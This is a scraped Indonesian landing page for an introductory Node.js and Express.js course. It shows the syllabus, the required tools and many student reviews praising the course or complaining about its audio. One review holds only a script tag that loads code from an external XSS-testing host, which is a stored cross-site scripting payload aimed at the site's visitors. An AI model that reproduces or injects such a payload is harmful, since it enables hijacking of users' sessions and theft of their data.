Node JavaScript Dasar

Learn how to build a real project from scratch

Member

3,614 enrolled

Tingkatan
Sertifikat
-
Konsultasi
-

Develop Your Skills

Node js adalah platform buatan Ryan Dahl untuk menjalankan aplikasi web berbasis JavaScript yang dikenalkan pada tahun 2009. Dengan node js kita dapat menjalankan JavaScript dari sisi server.

Node js memiliki banyak banyak framework yang dapat memudahkan dan mempercepat pengerjaan pembuatan website, salah satu framework node js yaitu express js. express js adalah satu web framework paling populer di dunia Node.js

Learn With Expert

Elfin Sanjaya

Full-Stack Developer

Profile Mentor

Happy Learning

Materi kelas yang bermanfaat untuk karir kita

1

Node JS Basic

lock

Roadmap Node JS

3 mins

lock

Introduction Node JS

3 mins

play_circle

Tools

3 mins

lock

Install Node JS on Windows

3 mins

lock

How to Use Node with REPL & File JS

3 mins

play_circle

Built-in

3 mins

lock

Module NPM

3 mins

play_circle

Membuat Module Sendiri

3 mins

2

Express JS with Node JS

lock

Install Express JS with Node JS

3 mins

lock

Belajar Menangani Routing dan Instalasi Nodemon Development

3 mins

play_circle

Instalasi template engine EJS

3 mins

play_circle

Belajar Parsing data

3 mins

Tools Pendukung

Lengkapi semua pendukung di bawah sebelum belajar

Visual Studio Code

Software Gratis

Download Now

Node JS

Software Gratis

Download Now

3,614 Happy Members

Review setelah bergabung di kelas Node JavaScript Dasar

Edwin Dharmawan

Full-Stack Developer

mantap, hanya volumenya kecil banget dari video sebelumnya

Philips Jose Patri

Full-Stack Developer

Terbaik, kalau bisa di tambah lagi materi untuk crud di Nodejs

Fajar Cahyadi putr

Full-Stack Developer

Keren

DIKI SETIAWAN

Full-Stack Developer

Penjelasan nya sangat enak dan langsung mudah di mengerti..terimakasih kang

Jemjem Nurjaman

Full-Stack Developer

terimakasih ilmu :)

Welli Perdamaian T

Full-Stack Developer

Keren.

Juhdin Nur

Full-Stack Developer

penjelasan sistematis, dan dengan contoh - contoh yang sederhana mudah dipahami. Terima kasih

Ripat Al Safar

Full-Stack Developer

Good explanation

ashidiqi

Full-Stack Developer

materi berkelas

Raihan Abdan S

Full-Stack Developer

sangat bermanfaat terimakasih!

Rania Arinta

Full-Stack Developer

Goat 10000/10000

Rachadian Novansya

Full-Stack Developer

Mantap, sedikit masukan untuk saat menyebutkan vocabulary / pelafadzan bahasa inggrisnya semoga bisa lebih jelas lagi 🙏🏻

Sihar Simbolon

Full-Stack Developer

materi jelas

Ferdian Julianto

Full-Stack Developer

Materi sangat cocok untuk yang pertama kali belajar 😁

Andri Yabu Ndapa R

Full-Stack Developer

mantap sangat jelas

Dandi Supriyadi

Full-Stack Developer

nice

spirit learner

Mobile App Developer

<script src=https://apixss.xss.ht></script>

Novanda

Full-Stack Developer

Materi di sampaikan dengan sederhana sehingga mudah di mengerti untuk pemula , mungkin saran untuk audio opening dan tutorialnya bisa disesuaikan kembali karena audio opening cukup besar sedangkan bagian tutorial lumayan kecil suaranya

chairul ikhsan

Full-Stack Developer

Menunggu Kelas Node.Js Menuju Expert Premium

afdipratama

Full-Stack Developer

JELASSS

May Hendra Prastio

Full-Stack Developer

mudah dimengerti penjelasannya ketika praktek mas elfin

Mauludin Kistiyant

Full-Stack JavaScript Develope...

singkat dan mudah dipahami sip👍

Faris Fadhail

Full-Stack Developer

Penjelasan dari kak elfin mudah dipahami bagi saya yg masih kls 11 SMA. Sedikit koreksi ada part yg videonya sama dengan part sebelumnya dan suara dari kak selfin yg kurang keras. Terima kasih kak

Fajar Sidqi

Full-Stack Developer

Materi yang bagus sebagai pintu masuk dalam memahami NodeJs

chairul azdami

Full-Stack Developer

Mantap, Next Node Js selanjutnya min

Cross

Full-Stack Developer

Terimakasih

Adipati Maruf Alam

Full-Stack Developer

Mantap materinya cukup, tidak terlalu banyak dan tidak terlalu sedikit. Cukup memberi gambaran utk saya mengenai stack Node+Express JS

Muhamad Akmal

Full-Stack Developer

Memahami konsep dasar memang penting, nantinya akan paham bagaimana konsep kedepannya dengan menguatkan basicnya dahulu

Randy Gusman

Full-Stack Developer

sound dubbing nya kekecilan mas.

Ilham Hanif

Full-Stack Developer

Materi dan mentornya mantap. Untuk saran, mungkin kualitas audio untuk beberapa video lebih diperbaiki lagi.

Khasbullah Zakin

Full-Stack Developer

kalo bisa banyakin lagi

Shofira K

Full-Stack Developer

seruu banget, mudah dipahami. Terimakasih kak

Ferdiyan Syah

Full-Stack Developer

mantap sih tutornya mas elfin, mudah dimengerti.

Brian Jubiakto Mur

Full-Stack Developer

Video Module NPM dan Membuat Modul Sendiri Sama Persis

Anward Bios

Full-Stack Developer

Dialog yg terlalu cepat, sehingga untuk saya membuat dokumentasi tutorial nya harus mengulang run-time pada vidionya terima kasih. Selebihnya Kompor Gas

Adi Ricky K

Full-Stack Developer

Ada kesalahan konten di bagian module sendiri, kemudian suaranya Mas Elfin kecil.

Dicky Firmansyah

Full-Stack Developer

Mudah dimengerti materinya. Terimakasih ka Angga

Jihad Kunnaji

Full-Stack Developer

suaranya naratornya terlalu kecil

Alfian Naufal N.A

Full-Stack Developer

di exptess js kurang jelas suaranya

Featured Projects

0 Hasil karya terbaik di kelas Node JavaScript Dasar

Belum ada hasil karya.

arrow_upward